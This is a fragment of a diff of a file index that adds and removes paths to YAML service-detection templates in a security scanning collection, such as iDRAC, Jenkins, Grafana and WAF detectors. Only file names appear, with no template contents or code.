+43237,6 @@ ./poc/detect/cname-service-detector.yaml ./poc/detect/cobbler-version-detect.yaml ./poc/detect/cockpit-detect-1125.yaml -./poc/detect/cockpit-detect-1126.yaml ./poc/detect/cockpit-detect-1128.yaml ./poc/detect/cofense-vision-detection.yaml ./poc/detect/colasoft-network-information-comprehensive-detection-and-processing-platform.yaml @@ -43232,7 +43261,6 @@ ./poc/detect/cql-native-transport-detect.yaml ./poc/detect/craft-cms-detect-1246.yaml ./poc/detect/craft-cms-detect-1247.yaml -./poc/detect/craft-cms-detect-1248.yaml ./poc/detect/create-mysql-detection.yaml ./poc/detect/crush-ftp-detect-1270.yaml ./poc/detect/crush-ftp-detect-1271.yaml @@ -43248,7 +43276,6 @@ ./poc/detect/custom-connection-server-detect.yaml ./poc/detect/custom-ctc-panel-detect.yaml ./poc/detect/custom-data-alert-engine-service-detect.yaml -./poc/detect/custom-data-result-service-detect.yaml ./poc/detect/custom-datadump-source-code-detect.yaml ./poc/detect/custom-dom-xss-detect.yaml ./poc/detect/custom-dot-git-detect.yaml @@ -43282,30 +43309,31 @@ ./poc/detect/default-detect-generic-6837.yaml ./poc/detect/default-detect-generic-6838.yaml ./poc/detect/dell-bmc-panel-detect.yaml -./poc/detect/dell-idrac6-detect-6918.yaml ./poc/detect/dell-idrac6-detect-6919.yaml ./poc/detect/dell-idrac6-detect-6920.yaml ./poc/detect/dell-idrac6-detect-6921.yaml -./poc/detect/dell-idrac6-detect.yaml +./poc/detect/dell-idrac7-detect-6922.yaml ./poc/detect/dell-idrac7-detect-6923.yaml ./poc/detect/dell-idrac7-detect-6924.yaml ./poc/detect/dell-idrac7-detect-6925.yaml ./poc/detect/dell-idrac8-detect-6926.yaml +./poc/detect/dell-idrac8-detect-6927.yaml ./poc/detect/dell-idrac8-detect-6928.yaml ./poc/detect/dell-idrac8-detect-6929.yaml +./poc/detect/dell-idrac8-detect.yaml ./poc/detect/dell-idrac9-detect-6936.yaml ./poc/detect/dell-idrac9-detect-6937.yaml -./poc/detect/dell-idrac9-detect-6938.yaml -./poc/detect/dell-idrac9-detect-6939.yaml ./poc/detect/dell-idrac9-detect-6940.yaml ./poc/detect/dell-idrac9-detect-6941.yaml ./poc/detect/dell-remote-power-management-detect.yaml ./poc/detect/deprecated-sshv1-detection.yaml ./poc/detect/detect-addpac-voip-gateway-6963.yaml ./poc/detect/detect-addpac-voip-gateway-6964.yaml +./poc/detect/detect-addpac-voip-gateway-6965.yaml ./poc/detect/detect-all-takeover.yaml ./poc/detect/detect-all-takeovers.yaml ./poc/detect/detect-all-takovers.yaml +./poc/detect/detect-dangling-cname-6966.yaml ./poc/detect/detect-dangling-cname-6967.yaml ./poc/detect/detect-dangling-cname-6968.yaml ./poc/detect/detect-dns-over-https-6969.yaml @@ -43317,16 +43345,17 @@ ./poc/detect/detect-generic-website.yaml ./poc/detect/detect-jabber-xmpp-6974.yaml ./poc/detect/detect-jabber-xmpp-6975.yaml -./poc/detect/detect-options-method-6977.yaml ./poc/detect/detect-options-method-6978.yaml ./poc/detect/detect-options-method.yaml ./poc/detect/detect-rsyncd-6979.yaml ./poc/detect/detect-rsyncd-6980.yaml ./poc/detect/detect-rsyncd-6981.yaml +./poc/detect/detect-rsyncd-6982.yaml ./poc/detect/detect-rsyncd.yaml -./poc/detect/detect-sentry-6983.yaml +./poc/detect/detect-sentry-6984.yaml ./poc/detect/detect-sentry-6985.yaml ./poc/detect/detect-sentry-6986.yaml +./poc/detect/detect-sentry.yaml ./poc/detect/detect-springboot-actuator.yaml ./poc/detect/detect-ssl-issuer.yaml ./poc/detect/detect-tracer-sc-web.yaml @@ -43343,7 +43372,6 @@ ./poc/detect/dionaea-smb-honeypot-detection.yaml ./poc/detect/django-debug-detect-7024.yaml ./poc/detect/django-debug-detect-7025.yaml -./poc/detect/django-debug-detect-7026.yaml ./poc/detect/django-debug-detect-7027.yaml ./poc/detect/django-debug-detect.yaml ./poc/detect/dns-saas-service-detection.yaml @@ -43352,7 +43380,6 @@ ./poc/detect/dns-waf-detect.yaml ./poc/detect/dnssec-detection-7051.yaml ./poc/detect/docker-api-detection.yaml -./poc/detect/dolibarr-detect-7069.yaml ./poc/detect/dolibarr-detect-7070.yaml ./poc/detect/dolibarr-detect-7071.yaml ./poc/detect/dolibarr-detect.yaml @@ -43364,19 +43391,19 @@ ./poc/detect/dotnet-remoting-service-detect.yaml ./poc/detect/druid-detect-7099.yaml ./poc/detect/druid-detect.yaml -./poc/detect/dwr-index-detect-7134.yaml ./poc/detect/dwr-index-detect-7135.yaml ./poc/detect/dwr-index-detect-7136.yaml ./poc/detect/ec2-detection-7161.yaml -./poc/detect/ec2-detection-7162.yaml ./poc/detect/ec2-detection-7163.yaml ./poc/detect/eg-manager-detect-7182.yaml +./poc/detect/eg-manager-detect-7183.yaml ./poc/detect/eg-manager-detect-7184.yaml -./poc/detect/eg-manager-detect.yaml ./poc/detect/elasticpot-honeypot-detection.yaml ./poc/detect/elasticsearch-sql-client-detect-7189.yaml +./poc/detect/elasticsearch-sql-client-detect-7190.yaml ./poc/detect/elasticsearch-sql-client-detect-7191.yaml ./poc/detect/elasticsearch-sql-client-detect-7192.yaml +./poc/detect/elasticsearch-sql-client-detect.yaml ./poc/detect/electron-version-detect.yaml ./poc/detect/elfinder-detect-1.yaml ./poc/detect/elfinder-detect-2.yaml @@ -43398,28 +43425,30 @@ ./poc/detect/epson-web-control-detect-7242.yaml ./poc/detect/epson-web-control-detect.yaml ./poc/detect/error-stack-trace-detect.yaml +./poc/detect/esmtp-detect.yaml +./poc/detect/exim-detect.yaml ./poc/detect/expn-mail-detect-7278.yaml ./poc/detect/expn-mail-detect.yaml ./poc/detect/fanruanoa-detect-1.yaml ./poc/detect/fanruanoa-detect-2.yaml +./poc/detect/fanruanoa-detect-7391.yaml ./poc/detect/fanruanoa-detect-7392.yaml -./poc/detect/fanruanoa-detect.yaml ./poc/detect/fanruanoa2012-detect-7387.yaml ./poc/detect/fanruanoa2012-detect-7388.yaml -./poc/detect/fatpipe-mpvpn-detect-7437.yaml ./poc/detect/fatpipe-mpvpn-detect-7438.yaml ./poc/detect/fatpipe-mpvpn-detect.yaml +./poc/detect/fatpipe-warp-detect-7439.yaml ./poc/detect/fatpipe-warp-detect-7440.yaml ./poc/detect/fatpipe-warp-detect.yaml ./poc/detect/favicon-detect.yaml ./poc/detect/favicon-detection-7441.yaml ./poc/detect/favicon-detection-7442.yaml +./poc/detect/favicon-detection-7443.yaml ./poc/detect/favicon-detection-7445.yaml ./poc/detect/favicon-detection-7446.yaml ./poc/detect/favicon-detection.yaml ./poc/detect/ffserver-detect.yaml ./poc/detect/firebase-detect-7492.yaml -./poc/detect/firebase-detect-7493.yaml ./poc/detect/firebase-detect-7495.yaml ./poc/detect/firebase-detect.yaml ./poc/detect/flink-version-detect.yaml @@ -43430,9 +43459,8 @@ ./poc/detect/fortiauthenticator-detect.yaml ./poc/detect/fortinet-detect.yaml ./poc/detect/froxlor-detect-7551.yaml -./poc/detect/froxlor-detect-7552.yaml -./poc/detect/froxlor-detect-7553.yaml ./poc/detect/froxlor-detect-7554.yaml +./poc/detect/froxlor-detect.yaml ./poc/detect/fuji-xerox-printer-detect.yaml ./poc/detect/gaspot-honeypot-detection.yaml ./poc/detect/geowebserver-detector.yaml @@ -43445,7 +43473,6 @@ ./poc/detect/getsimple-cms-detect-7614.yaml ./poc/detect/getsimple-cms-detect-7615.yaml ./poc/detect/getsimple-cms-detector-7611.yaml -./poc/detect/getsimple-cms-detector-7613.yaml ./poc/detect/getsimple-cms-detector.yaml ./poc/detect/gilacms-detect-1.yaml ./poc/detect/gilacms-detect-2.yaml @@ -43458,7 +43485,6 @@ ./poc/detect/gitea-detect.yaml ./poc/detect/github-enterprise-detect-7647.yaml ./poc/detect/github-enterprise-detect-7648.yaml -./poc/detect/github-enterprise-detect-7649.yaml ./poc/detect/github-enterprise-detect-7650.yaml ./poc/detect/github-enterprise-detect-7651.yaml ./poc/detect/github-enterprise-detect.yaml @@ -43478,12 +43504,12 @@ ./poc/detect/goahead-detected.yaml ./poc/detect/gopher-detection.yaml ./poc/detect/gradle-cache-node-detect-7797.yaml +./poc/detect/gradle-cache-node-detect-7798.yaml ./poc/detect/gradle-cache-node-detect.yaml ./poc/detect/gradle-enterprise-build-cache-detect.yaml ./poc/detect/gradle-enterprise-build-cache-detect.yml ./poc/detect/grafana-detect-7805.yaml ./poc/detect/grafana-detect-7806.yaml -./poc/detect/grafana-detect-7807.yaml ./poc/detect/grafana-detect-7809.yaml ./poc/detect/grafana-detect.yaml ./poc/detect/graphite-browser-detect.yaml @@ -43492,7 +43518,6 @@ ./poc/detect/graphql-ariadne-detect.yaml ./poc/detect/graphql-detect-7829.yaml ./poc/detect/graphql-detect-7830.yaml -./poc/detect/graphql-detect-7831.yaml ./poc/detect/graphql-detect-7832.yaml ./poc/detect/graphql-detect.yaml ./poc/detect/graphql-dianajl-detect.yaml @@ -43512,8 +43537,9 @@ ./poc/detect/graphql-wpgraphql-detect.yaml ./poc/detect/grav-cms-detect-7841.yaml ./poc/detect/grav-cms-detect-7842.yaml +./poc/detect/grav-cms-detect-7843.yaml +./poc/detect/grav-cms-detect-7844.yaml ./poc/detect/grav-cms-detect-7845.yaml -./poc/detect/grav-cms-detect.yaml ./poc/detect/gunicorn-detect-7863.yaml ./poc/detect/gunicorn-detect-7864.yaml ./poc/detect/gunicorn-detect-7865.yaml @@ -43522,10 +43548,9 @@ ./poc/detect/harbor-detect-7886.yaml ./poc/detect/harbor-detect-7887.yaml ./poc/detect/harbor-detect-7888.yaml -./poc/detect/harbor-detect.yaml ./poc/detect/hash-detection.yaml -./poc/detect/herokuapp-detect-7937.yaml ./poc/detect/herokuapp-detect-7938.yaml +./poc/detect/herokuapp-detect-7939.yaml ./poc/detect/herokuapp-detect-7940.yaml ./poc/detect/herokuapp-detect.yaml ./poc/detect/hikvision-detection-1.yaml @@ -43534,7 +43559,6 @@ ./poc/detect/hikvision-detection.yaml ./poc/detect/home-assistant-detect.yaml ./poc/detect/hp-blade-admin-detect-8003.yaml -./poc/detect/hp-blade-admin-detect-8004.yaml ./poc/detect/hp-blade-admin-detect-8005.yaml ./poc/detect/hp-color-laserjet-detect-8006.yaml ./poc/detect/hp-color-laserjet-detect.yaml @@ -43545,10 +43569,10 @@ ./poc/detect/hp-device-info-detect.yaml ./poc/detect/hp-laserjet-detect-8026.yaml ./poc/detect/hp-laserjet-detect-8027.yaml +./poc/detect/hp-laserjet-detect.yaml ./poc/detect/hp-media-vault-detect-8029.yaml ./poc/detect/hp-media-vault-detect-8031.yaml ./poc/detect/htpasswd-detection-8045.yaml -./poc/detect/htpasswd-detection-8046.yaml ./poc/detect/htpasswd-detection.yaml ./poc/detect/httpbin-detection.yaml ./poc/detect/httpbin-detection.yml @@ -43560,11 +43584,11 @@ ./poc/detect/icewarp-panel-detect.yaml ./poc/detect/iis-detect.yaml ./poc/detect/iis-errorpage-detection-all-lang.yaml -./poc/detect/ilo-detect-8154.yaml +./poc/detect/ilo-detect-8155.yaml ./poc/detect/ilo-detect-8157.yaml -./poc/detect/ilo-detect.yaml ./poc/detect/ilo-upnp-detect.yaml ./poc/detect/influxdb-detect-8158.yaml +./poc/detect/influxdb-detect-8159.yaml ./poc/detect/influxdb-detect.yaml ./poc/detect/insecure-cipher-suite-detect.yaml ./poc/detect/iomega-lenovo-emc-shared-nas-detect-8182.yaml @@ -43575,7 +43599,6 @@ ./poc/detect/istat-panel-detect.yaml ./poc/detect/itop-detect-8201.yaml ./poc/detect/itop-detect-8202.yaml -./poc/detect/itop-detect-8203.yaml ./poc/detect/itop-detect.yaml ./poc/detect/jaspersoft-detect-8219.yaml ./poc/detect/jaspersoft-detect-8220.yaml @@ -43586,7 +43609,6 @@ ./poc/detect/jboss-detect-8237.yaml ./poc/detect/jeecg-boot-detect-8247.yaml ./poc/detect/jeecg-boot-detect-8248.yaml -./poc/detect/jeecg-boot-detect.yaml ./poc/detect/jeedom-detect-8250.yaml ./poc/detect/jeedom-detect-8251.yaml ./poc/detect/jeedom-detect.yaml @@ -43597,7 +43619,6 @@ ./poc/detect/jellyfin-detect-8257.yaml ./poc/detect/jellyfin-detect-8258.yaml ./poc/detect/jellyfin-detect-8260.yaml -./poc/detect/jellyfin-detect.yaml ./poc/detect/jenkins-detect-8274.yaml ./poc/detect/jenkins-detect-8276.yaml ./poc/detect/jenkins-detect.yaml @@ -43607,6 +43628,7 @@ ./poc/detect/jira-detect-2.yaml ./poc/detect/jira-detect-3.yaml ./poc/detect/jira-detect-8313.yaml +./poc/detect/jira-detect-8314.yaml ./poc/detect/jira-detect-8315.yaml ./poc/detect/jira-detect-8316.yaml ./poc/detect/jira-detect.yaml @@ -43619,6 +43641,7 @@ ./poc/detect/kevinlab-device-detect-1.yaml ./poc/detect/kevinlab-device-detect-2.yaml ./poc/detect/kevinlab-device-detect-8461.yaml +./poc/detect/kevinlab-device-detect.yaml ./poc/detect/kibana-detect-1.yaml ./poc/detect/kibana-detect-2.yaml ./poc/detect/kibana-detect-3.yaml @@ -43636,14 +43659,13 @@ ./poc/detect/laravel-detect.yaml ./poc/detect/lenovo-logo-detect.yaml ./poc/detect/leostream-detection.yaml -./poc/detect/leostream-detection.yml ./poc/detect/liferay-portal-detect-1.yaml ./poc/detect/liferay-portal-detect-2.yaml ./poc/detect/liferay-portal-detect-8621.yaml ./poc/detect/liferay-portal-detect-8622.yaml -./poc/detect/liferay-portal-detect-8623.yaml ./poc/detect/liferay-portal-detect-8624.yaml ./poc/detect/liferay-portal-detect-8625.yaml +./poc/detect/liferay-portal-detect-8626.yaml ./poc/detect/liferay-portal-detect.yaml ./poc/detect/lightdash-detect.nuclei.yaml ./poc/detect/linkerd-badrule-detect-8629.yaml @@ -43664,6 +43686,7 @@ ./poc/detect/log4j-rce-detect-waf-bypass.yaml ./poc/detect/log4jshell-detect.yaml ./poc/detect/lucee-detect-8658.yaml +./poc/detect/lucee-detect-8659.yaml ./poc/detect/lucee-detect-8660.yaml ./poc/detect/lucee-detect-8661.yaml ./poc/detect/lucee-detect.yaml @@ -43674,16 +43697,16 @@ ./poc/detect/magento-detect-8705.yaml ./poc/detect/magento-detect-8706.yaml ./poc/detect/magento-detect-8707.yaml +./poc/detect/magmi-detect-8714.yaml ./poc/detect/magmi-detect-8715.yaml ./poc/detect/magmi-detect-8716.yaml ./poc/detect/magmi-detect-8717.yaml -./poc/detect/magmi-detect.yaml ./poc/detect/mahara-version-detect.yaml ./poc/detect/maian-cart-detect-8718.yaml -./poc/detect/maian-cart-detect.yaml +./poc/detect/maian-cart-detect-8719.yaml ./poc/detect/mailoney-honeypot-detection.yaml +./poc/detect/mantis-detect-8780.yaml ./poc/detect/mantis-detect-8781.yaml -./poc/detect/mantis-detect-8782.yaml ./poc/detect/mantis-detect.yaml ./poc/detect/mautic-crm-detect-8787.yaml ./poc/detect/mautic-crm-detect-8788.yaml @@ -43691,11 +43714,13 @@ ./poc/detect/maxforwards-headers-detect.yaml ./poc/detect/mediawiki-version-detect.yaml ./poc/detect/megarac-sp-ui-detect.yaml +./poc/detect/metabase-detect-8804.yaml ./poc/detect/metabase-detect-8805.yaml ./poc/detect/metabase-detect.yaml ./poc/detect/mfiles-web-detect.yaml ./poc/detect/microsoft-echange-server-detect.yaml ./poc/detect/microsoft-exchange-server-detect-8852.yaml +./poc/detect/microsoft-exchange-server-detect-8853.yaml ./poc/detect/microsoft-exchange-server-detect.yaml ./poc/detect/microsoft-ftp-service-detect.yaml ./poc/detect/microstrategy-detect-1.yaml @@ -43714,18 +43739,18 @@ ./poc/detect/microstrategy-detect-7.yaml ./poc/detect/microstrategy-detect-8.yaml ./poc/detect/microstrategy-detect-9.yaml -./poc/detect/microweber-detect-8862.yaml ./poc/detect/microweber-detect-8863.yaml ./poc/detect/mikrotik-routeros-api-detect.yaml +./poc/detect/minio-console-detect-8884.yaml ./poc/detect/minio-console-detect-8885.yaml ./poc/detect/minio-console-detect.yaml -./poc/detect/minio-detect-8892.yaml ./poc/detect/minio-detect-8893.yaml ./poc/detect/minio-detect-8894.yaml ./poc/detect/minio-detect.yaml ./poc/detect/mitel-panel-detect.yaml ./poc/detect/mobileiron-version-detect.yaml ./poc/detect/moinmoin-detect-8915.yaml +./poc/detect/moinmoin-detect-8916.yaml ./poc/detect/moinmoin-detect-8917.yaml ./poc/detect/moinmoin-detect-8918.yaml ./poc/detect/moinmoin-detect.yaml @@ -43740,14 +43765,13 @@ ./poc/detect/mrtg-detect-8958.yaml ./poc/detect/mrtg-detect-8959.yaml ./poc/detect/mrtg-detect.yaml -./poc/detect/ms-adcs-detect-8960.yaml +./poc/detect/ms-adcs-detect-8961.yaml ./poc/detect/ms-adcs-detect.yaml ./poc/detect/ms-sql-detect.yaml ./poc/detect/mssql-detect.yaml ./poc/detect/mx-service-detector-8974.yaml ./poc/detect/mx-service-detector-8975.yaml ./poc/detect/mx-service-detector-8977.yaml -./poc/detect/mx-service-detector.yaml ./poc/detect/mybb-forum-detect.yaml ./poc/detect/nacos-detect.yaml ./poc/detect/nameserver-detection.yaml @@ -43761,7 +43785,6 @@ ./poc/detect/netsweeper-webadmin-detect-2.yaml ./poc/detect/netsweeper-webadmin-detect-9066.yaml ./poc/detect/netsweeper-webadmin-detect-9067.yaml -./poc/detect/netsweeper-webadmin-detect-9068.yaml ./poc/detect/netsweeper-webadmin-detect.yaml ./poc/detect/network-camera-detect-9069.yaml ./poc/detect/network-camera-detect.yaml @@ -43769,18 +43792,18 @@ ./poc/detect/nextcloud-detect-2.yaml ./poc/detect/nextcloud-detect-3.yaml ./poc/detect/nextcloud-detect-9080.yaml -./poc/detect/nextcloud-detect.yaml +./poc/detect/nextcloud-detect-9081.yaml ./poc/detect/nextcloud-owncloud-detect.yaml ./poc/detect/nexus-detect-9092.yaml -./poc/detect/nexus-detect-9093.yaml ./poc/detect/nexus-detect-9094.yaml -./poc/detect/nexus-detect-9095.yaml +./poc/detect/nexus-detect.yaml ./poc/detect/nexus-oss-detect.yaml ./poc/detect/nginx-Detect.yaml ./poc/detect/nginx-server-detection.yaml ./poc/detect/node-red-detect-9138.yaml -./poc/detect/node-red-detect.yaml +./poc/detect/node-red-detect-9139.yaml ./poc/detect/oauth2-detect-9180.yaml +./poc/detect/oauth2-detect-9181.yaml ./poc/detect/oauth2-detect-9182.yaml ./poc/detect/oauth2-detect-9183.yaml ./poc/detect/octobercms-detect-1.yaml @@ -43792,15 +43815,15 @@ ./poc/detect/oidc-detect-9218.yaml ./poc/detect/oipm-detect-9219.yaml ./poc/detect/oipm-detect-9220.yaml -./poc/detect/oipm-detect-9222.yaml +./poc/detect/oipm-detect-9221.yaml ./poc/detect/oipm-detect.yaml ./poc/detect/olivetti-crf-detect-9242.yaml ./poc/detect/olivetti-crf-detect-9244.yaml ./poc/detect/olivetti-crf-detect.yaml ./poc/detect/oneblog-detect-9245.yaml ./poc/detect/oneblog-detect-9247.yaml -./poc/detect/oneblog-detect.yaml ./poc/detect/open-virtualization-manager-detect-9325.yaml +./poc/detect/open-virtualization-manager-detect-9326.yaml ./poc/detect/open-virtualization-manager-detect.yaml ./poc/detect/openam-detect.yaml ./poc/detect/openam-detection-1.yaml @@ -43828,11 +43851,12 @@ ./poc/detect/opencast-detect-9266.yaml ./poc/detect/openemr-detect-9271.yaml ./poc/detect/openemr-detect-9272.yaml -./poc/detect/openemr-detect-9273.yaml +./poc/detect/openemr-detect-9274.yaml ./poc/detect/openemr-detect.yaml ./poc/detect/opengear-detect.yaml ./poc/detect/opensis-detect-1.yaml ./poc/detect/opensis-detect-2.yaml +./poc/detect/opensis-detect-9313.yaml ./poc/detect/opensis-detect.yaml ./poc/detect/openssh-detect.yml ./poc/detect/openssh-detection.yaml @@ -43841,6 +43865,7 @@ ./poc/detect/openx-detect.yaml ./poc/detect/oracle-dbass-detect-9349.yaml ./poc/detect/oracle-dbass-detect-9350.yaml +./poc/detect/oracle-dbass-detect-9351.yaml ./poc/detect/owasp-juice-shop-detected-9414.yaml ./poc/detect/owasp-juice-shop-detected-9415.yaml ./poc/detect/owasp-juice-shop-detected-9417.yaml @@ -43856,9 +43881,9 @@ ./poc/detect/php-proxy-detect-1.yaml ./poc/detect/php-proxy-detect-2.yaml ./poc/detect/php-proxy-detect-9544.yaml -./poc/detect/php-proxy-detect-9545.yaml +./poc/detect/php-proxy-detect.yaml +./poc/detect/phpcollab-detect-9499.yaml ./poc/detect/phpcollab-detect-9500.yaml -./poc/detect/phpcollab-detect-9501.yaml ./poc/detect/phpcollab-detect.yaml ./poc/detect/phpmyadmin-version-detect.yaml ./poc/detect/phpmyadmin-version-detection.yaml @@ -43884,22 +43909,21 @@ ./poc/detect/prtg-detect-9703.yaml ./poc/detect/prtg-detect-9704.yaml ./poc/detect/prtg-detect-9705.yaml -./poc/detect/prtg-detect-9706.yaml ./poc/detect/prtg-detect.yaml ./poc/detect/prtg-version-detect.yaml ./poc/detect/pulse-secure-version-detect.yaml ./poc/detect/puppet-node-manager-detect-9720.yaml ./poc/detect/puppetdb-detect-9717.yaml -./poc/detect/puppetdb-detect-9718.yaml +./poc/detect/puppetdb-detect-9719.yaml +./poc/detect/puppetdb-detect.yaml ./poc/detect/puppetserver-detect-9721.yaml ./poc/detect/puppetserver-detect-9723.yaml -./poc/detect/puppetserver-detect.yaml ./poc/detect/qnap_nas_detect.yaml ./poc/detect/quantum-scalar-detect.yaml ./poc/detect/ranger-detection-9830.yaml ./poc/detect/rdp-detect-9838.yaml ./poc/detect/rdp-detect-9839.yaml -./poc/detect/rdp-detect-9840.yaml +./poc/detect/rdp-detect.yaml ./poc/detect/redash-detection.yaml ./poc/detect/redash-detection.yml ./poc/detect/redcap-detector-9848.yaml @@ -43926,8 +43950,7 @@ ./poc/detect/reverse-proxy-detect.yaml ./poc/detect/rhymix-cms-detect-9876.yaml ./poc/detect/rhymix-cms-detect-9877.yaml -./poc/detect/rhymix-cms-detect-9878.yaml -./poc/detect/rhymix-cms-detect.yaml +./poc/detect/rhymix-cms-detect-9879.yaml ./poc/detect/riak-detect.yaml ./poc/detect/room-alert-detect.yaml ./poc/detect/routeros-version-detect.yaml @@ -43938,7 +43961,6 @@ ./poc/detect/s3-detect-9962.yaml ./poc/detect/s3-detect-9963.yaml ./poc/detect/s3-detect-9964.yaml -./poc/detect/s3-detect-9965.yaml ./poc/detect/s3-detect.yaml ./poc/detect/saas-service-detection.yaml ./poc/detect/sage-detect-9975.yaml @@ -43960,10 +43982,9 @@ ./poc/detect/sap-netweaver-detect-10043.yaml ./poc/detect/sap-netweaver-detect-10044.yaml ./poc/detect/sap-netweaver-detect-10046.yaml -./poc/detect/sap-netweaver-detect-10047.yaml ./poc/detect/sap-netweaver-detect-10048.yaml ./poc/detect/sap-netweaver-detect.yaml -./poc/detect/sap-recon-detect-10063.yaml +./poc/detect/sap-recon-detect-10062.yaml ./poc/detect/sap-recon-detect.yaml ./poc/detect/sap-successfactors-detect.yaml ./poc/detect/saprouter-detect.yaml @@ -43972,7 +43993,6 @@ ./poc/detect/secmail-detect-10109.yaml ./poc/detect/secmail-detect-10110.yaml ./poc/detect/secmail-detect-10111.yaml -./poc/detect/secmail-detect-10112.yaml ./poc/detect/secmail-detect.yaml ./poc/detect/securityspy-detect-10120.yaml ./poc/detect/securityspy-detect-10121.yaml @@ -43983,19 +44003,20 @@ ./poc/detect/server-backup-manager-se-login-detect.yaml ./poc/detect/shiro-deserialization-detection.yaml ./poc/detect/shiro-detect-10195.yaml +./poc/detect/shiro-detect-10196.yaml ./poc/detect/shiro-detect-10197.yaml -./poc/detect/shiro-detect.yaml ./poc/detect/shopizer-detect-1.yaml ./poc/detect/shopizer-detect-2.yaml ./poc/detect/shopware-detect-1.yaml ./poc/detect/shopware-detect-10210.yaml +./poc/detect/shopware-detect-10211.yaml ./poc/detect/shopware-detect-10212.yaml ./poc/detect/shopware-detect-10213.yaml ./poc/detect/shopware-detect-2.yaml +./poc/detect/shopware-detect.yaml ./poc/detect/sitemap-detect.yaml ./poc/detect/sitemap-sql-detector.yaml ./poc/detect/smartstore-detect-10332.yaml -./poc/detect/smartstore-detect-10333.yaml ./poc/detect/smartstore-detect-10334.yaml ./poc/detect/smb-v1-detect.yaml ./poc/detect/smb-v1-detection-10336.yaml @@ -44012,7 +44033,7 @@ ./poc/detect/solarwinds-whd-version-detect.yaml ./poc/detect/somansa-dlp-detect.yaml ./poc/detect/sonicwall-email-security-detect-10383.yaml -./poc/detect/sonicwall-email-security-detect.yaml +./poc/detect/sonicwall-email-security-detect-10384.yaml ./poc/detect/sonicwall-secure-mobile-access-version-detect.yaml ./poc/detect/sophos-fw-version-detect-1.yaml ./poc/detect/sophos-fw-version-detect-10396.yaml @@ -44033,7 +44054,6 @@ ./poc/detect/strapi-cms-detect-10539.yaml ./poc/detect/strapi-cms-detect-10540.yaml ./poc/detect/strapi-cms-detect-10541.yaml -./poc/detect/strapi-cms-detect.yaml ./poc/detect/stridercd-detection.yaml ./poc/detect/stridercd-detection.yml ./poc/detect/sungrow-logger1000-detect.yaml @@ -44043,7 +44063,6 @@ ./poc/detect/tableau-server-detect.yaml ./poc/detect/tech-detect-10672.yaml ./poc/detect/tech-detect-10673.yaml -./poc/detect/tech-detect-10674.yaml ./poc/detect/tech-detect-10675.yaml ./poc/detect/tech-detect-10676.yaml ./poc/detect/tech-detect-10677.yaml @@ -44074,7 +44093,6 @@ ./poc/detect/telerik-fileupload-detect-10692.yaml ./poc/detect/telerik-fileupload-detect-10693.yaml ./poc/detect/telerik-fileupload-detect-10694.yaml -./poc/detect/telerik-fileupload-detect-10695.yaml ./poc/detect/telerik-fileupload-detect-10696.yaml ./poc/detect/telerik-fileupload-detect-10697.yaml ./poc/detect/telerik-fileupload-detect.yaml @@ -44097,6 +44115,7 @@ ./poc/detect/totemomail-detect-10817.yaml ./poc/detect/totemomail-detect-10818.yaml ./poc/detect/totemomail-detect.yaml +./poc/detect/totemomail-smtp-detect.yaml ./poc/detect/trace-axd-detect-10824.yaml ./poc/detect/trace-axd-detect-10825.yaml ./poc/detect/trace-axd-detect.yaml @@ -44104,7 +44123,7 @@ ./poc/detect/tyan-logo-detect.yaml ./poc/detect/tyan-rmm-ui-detect.yaml ./poc/detect/unauthorized-brother-access-detect.yaml -./poc/detect/unauthorized-puppet-node-manager-detect-10958.yaml +./poc/detect/unauthorized-puppet-node-manager-detect-10959.yaml ./poc/detect/unauthorized-puppet-node-manager-detect.yaml ./poc/detect/urls-detection.yaml ./poc/detect/vercel-detect.yaml @@ -44114,40 +44133,38 @@ ./poc/detect/versa-flexvnf-server-detect.yaml ./poc/detect/versa-flexvnf-ui-detect.yaml ./poc/detect/virtual-ema-detect-1.yaml -./poc/detect/virtual-ema-detect-11025.yaml +./poc/detect/virtual-ema-detect-11024.yaml ./poc/detect/virtual-ema-detect-2.yaml ./poc/detect/virtual-ema-detect.yaml ./poc/detect/vmware-airwatch-version-detect.yaml -./poc/detect/vmware-version-detect-11054.yaml ./poc/detect/vmware-version-detect-11055.yaml ./poc/detect/vmware-version-detect.yaml ./poc/detect/vmware-vrealize-detect-11056.yaml -./poc/detect/vmware-vrealize-detect-11057.yaml +./poc/detect/vmware-vrealize-detect-11058.yaml +./poc/detect/vmware-vrealize-detect.yaml ./poc/detect/vnc-detect-11062.yaml ./poc/detect/vnc-detect.yaml ./poc/detect/voipmonitor-detect.yaml ./poc/detect/vsftpd-detection-11073.yaml ./poc/detect/vsftpd-detection-11074.yaml ./poc/detect/vsftpd-detection-11075.yaml -./poc/detect/vsftpd-detection-11076.yaml ./poc/detect/vsftpd-detection.yaml ./poc/detect/waf-detect-11086.yaml ./poc/detect/waf-detect-11087.yaml ./poc/detect/waf-detect-11088.yaml -./poc/detect/waf-detect-11089.yaml ./poc/detect/waf-detect-11090.yaml ./poc/detect/waf-detect-azure.yaml ./poc/detect/waf-detect-cloudflare.yaml ./poc/detect/waf-detect-incapsula.yaml ./poc/detect/wagtail-cms-detect.yaml +./poc/detect/wamp-xdebug-detect-11100.yaml ./poc/detect/wamp-xdebug-detect-11101.yaml ./poc/detect/wamp-xdebug-detect-11102.yaml -./poc/detect/wamp-xdebug-detect-11103.yaml ./poc/detect/wamp-xdebug-detect-11104.yaml ./poc/detect/wamp-xdebug-detect.yaml ./poc/detect/wazuh-detect-11110.yaml +./poc/detect/wazuh-detect-11111.yaml ./poc/detect/wazuh-detect.yaml -./poc/detect/weave-scope-dashboard-detect-11118.yaml ./poc/detect/weave-scope-dashboard-detect-11119.yaml ./poc/detect/weave-scope-dashboard-detect-11120.yaml ./poc/detect/weave-scope-dashboard-detect.yaml @@ -44171,7 +44188,7 @@ ./poc/detect/weblogic-t3-detect.yaml ./poc/detect/websphere-version-detect.yaml ./poc/detect/werkzeug-debugger-detect-11195.yaml -./poc/detect/werkzeug-debugger-detect-11197.yaml +./poc/detect/werkzeug-debugger-detect-11196.yaml ./poc/detect/werkzeug-debugger-detect-11198.yaml ./poc/detect/werkzeug-debugger-detect.yaml ./poc/detect/what-waf-detect.yaml @@ -44182,7 +44199,8 @@ ./poc/detect/widget-detector-elementor-cb9fa42d925b49c26314653a0263606c.yaml ./poc/detect/widget-detector-elementor.yaml ./poc/detect/wondercms-detect-11221.yaml -./poc/detect/wondercms-detect-11222.yaml +./poc/detect/wondercms-detect-11223.yaml +./poc/detect/wondercms-detect.yaml ./poc/detect/wordpress-detect-11261.yaml ./poc/detect/wordpress-detect.yaml ./poc/detect/wordpress-detect2.yaml @@ -44198,8 +44216,8 @@ ./poc/detect/wordpress-website-detect.yaml ./poc/detect/worksites-detection-11383.yaml ./poc/detect/worksites-detection-11384.yaml 